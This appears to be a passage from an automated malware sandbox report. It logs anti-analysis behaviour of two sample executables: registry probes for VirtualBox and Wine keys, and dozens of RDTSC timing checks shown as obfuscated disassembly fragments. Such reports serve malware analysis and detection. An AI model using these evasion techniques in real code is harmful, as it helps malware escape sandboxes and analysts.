Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9A1E52 second address: 9A1E72 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F73D4C57606h 0x00000008 jmp 00007F73D4C57616h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9A1E72 second address: 9A1E7C instructions: 0x00000000 rdtsc 0x00000002 js 00007F73D4D0E04Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9A0F0C second address: 9A0F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9A1333 second address: 9A133E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9A133E second address: 9A1355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F73D4C5760Dh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9A340A second address: 9A3418 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F73D4D0E046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9A3418 second address: 9A341C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9A341C second address: 9A3434 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F73D4D0E04Dh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9A3434 second address: 9A3446 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F73D4C57606h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F73D4C57606h 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9A34AA second address: 9A34C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007F73D4D0E04Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9A34C0 second address: 9A358B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007F73D4C5760Eh 0x0000000d push 00000000h 0x0000000f or dword ptr [ebp+122D1C00h], esi 0x00000015 push 7B2CE066h 0x0000001a jmp 00007F73D4C57619h 0x0000001f xor dword ptr [esp], 7B2CE0E6h 0x00000026 mov dword ptr [ebp+122D1987h], esi 0x0000002c push 00000003h 0x0000002e sub dword ptr [ebp+122D2148h], edx 0x00000034 push 00000000h 0x00000036 sub dword ptr [ebp+122D24ABh], edi 0x0000003c push 00000003h 0x0000003e mov edi, dword ptr [ebp+122D2AC0h] 0x00000044 push B010676Fh 0x00000049 push ebx 0x0000004a jl 00007F73D4C57611h 0x00000050 jmp 00007F73D4C5760Bh 0x00000055 pop ebx 0x00000056 xor dword ptr [esp], 7010676Fh 0x0000005d cld 0x0000005e lea ebx, dword ptr [ebp+12448000h] 0x00000064 push 00000000h 0x00000066 push ecx 0x00000067 call 00007F73D4C57608h 0x0000006c pop ecx 0x0000006d mov dword ptr [esp+04h], ecx 0x00000071 add dword ptr [esp+04h], 00000014h 0x00000079 inc ecx 0x0000007a push ecx 0x0000007b ret 0x0000007c pop ecx 0x0000007d ret 0x0000007e call 00007F73D4C57616h 0x00000083 mov edi, dword ptr [ebp+122D2BA8h] 0x00000089 pop esi 0x0000008a push eax 0x0000008b jl 00007F73D4C57610h 0x00000091 push eax 0x00000092 push edx 0x00000093 push esi 0x00000094 pop esi 0x00000095 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 99335C second address: 993360 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 993360 second address: 99337A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F73D4C5760Ah 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C3ECE second address: 9C3ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C3ED2 second address: 9C3ED6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C41C9 second address: 9C41E1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F73D4D0E052h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C41E1 second address: 9C41E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C4BE5 second address: 9C4C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F73D4D0E059h 0x0000000b jmp 00007F73D4D0E04Fh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C4C13 second address: 9C4C1F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F73D4C57606h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C501C second address: 9C5040 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F73D4D0E046h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F73D4D0E055h 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 993335 second address: 99333B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 99333B second address: 99333F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 99333F second address: 99335C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F73D4C57606h 0x00000008 jmp 00007F73D4C5760Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9982E9 second address: 9982ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9982ED second address: 998318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C57613h 0x00000007 jmp 00007F73D4C57614h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C51BA second address: 9C51D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E058h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C51D6 second address: 9C51DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C51DE second address: 9C51E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C59D4 second address: 9C59FB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F73D4C5760Eh 0x0000000d jbe 00007F73D4C5760Ah 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C59FB second address: 9C5A1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Eh 0x00000007 jmp 00007F73D4D0E051h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C5A1E second address: 9C5A28 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F73D4C5760Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C5BAD second address: 9C5BE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4D0E04Ch 0x00000009 jnl 00007F73D4D0E046h 0x0000000f js 00007F73D4D0E046h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F73D4D0E055h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C5BE1 second address: 9C5BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C5D30 second address: 9C5D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9C93FE second address: 9C9414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4C57612h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9CA96B second address: 9CA970 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9CBE98 second address: 9CBEA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D1A24 second address: 9D1A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D1A2F second address: 9D1A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D1A33 second address: 9D1A3D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F73D4D0E046h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D1A3D second address: 9D1A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D1CD6 second address: 9D1CF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007F73D4D0E046h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F73D4D0E04Bh 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007F73D4D0E046h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D1CF8 second address: 9D1CFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D1CFE second address: 9D1D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F73D4D0E046h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D1D0A second address: 9D1D1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F73D4C57606h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D1D1C second address: 9D1D20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D2193 second address: 9D21C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F73D4C57614h 0x0000000d jmp 00007F73D4C57610h 0x00000012 pushad 0x00000013 push edi 0x00000014 pop edi 0x00000015 pushad 0x00000016 popad 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D2467 second address: 9D2486 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4D0E04Ah 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f jmp 00007F73D4D0E04Bh 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D3678 second address: 9D3683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D3A0C second address: 9D3A12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D3A12 second address: 9D3A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D3C5B second address: 9D3C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D3C5F second address: 9D3C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D493E second address: 9D494C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F73D4D0E04Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D66CF second address: 9D6723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007F73D4C57606h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jne 00007F73D4C5761Ah 0x00000014 push edi 0x00000015 jg 00007F73D4C57606h 0x0000001b pop edi 0x0000001c popad 0x0000001d nop 0x0000001e cld 0x0000001f push 00000000h 0x00000021 mov esi, ebx 0x00000023 push 00000000h 0x00000025 jnp 00007F73D4C5760Ch 0x0000002b push eax 0x0000002c je 00007F73D4C57614h 0x00000032 push eax 0x00000033 push edx 0x00000034 jno 00007F73D4C57606h 0x0000003a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D8138 second address: 9D813C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D8C87 second address: 9D8C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D8C8E second address: 9D8C9F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D8C9F second address: 9D8CE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F73D4C57606h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov edi, esi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007F73D4C57608h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d js 00007F73D4C5760Bh 0x00000033 xor di, E356h 0x00000038 push 00000000h 0x0000003a clc 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D8CE6 second address: 9D8D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F73D4D0E056h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DA20E second address: 9DA214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DACB4 second address: 9DACC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DACC3 second address: 9DACD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F73D4C5760Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DACD3 second address: 9DACD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DACD9 second address: 9DACDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DB732 second address: 9DB756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F73D4D0E057h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f push edx 0x00000010 pop edx 0x00000011 pop edi 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DB756 second address: 9DB7BB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F73D4C5761Eh 0x00000008 jmp 00007F73D4C57618h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 mov edi, dword ptr [ebp+122D1CA9h] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F73D4C57608h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Bh 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 mov edi, eax 0x00000034 push 00000000h 0x00000036 sub edi, 16BDA652h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 pushad 0x00000041 popad 0x00000042 jnl 00007F73D4C57606h 0x00000048 popad 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E0926 second address: 9E092C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E18E4 second address: 9E18E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E18E8 second address: 9E18EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E18EC second address: 9E18FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F73D4C5760Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D6E3F second address: 9D6E4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F73D4D0E04Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D8A70 second address: 9D8A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F73D4C57608h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E4976 second address: 9E497A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9D6E4F second address: 9D6E64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jo 00007F73D4C57608h 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9E497A second address: 9E4980 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\HCGCBFHCFC.exe RDTSC instruction interceptor: First address: 9DB4D7 second address: 9DB4EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jo 00007F73D4C5760Ch 0x0000000b jno 00007F73D4C57606h 0x00000011 popad 0x00000012 push eax 0x00000013 pushad 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
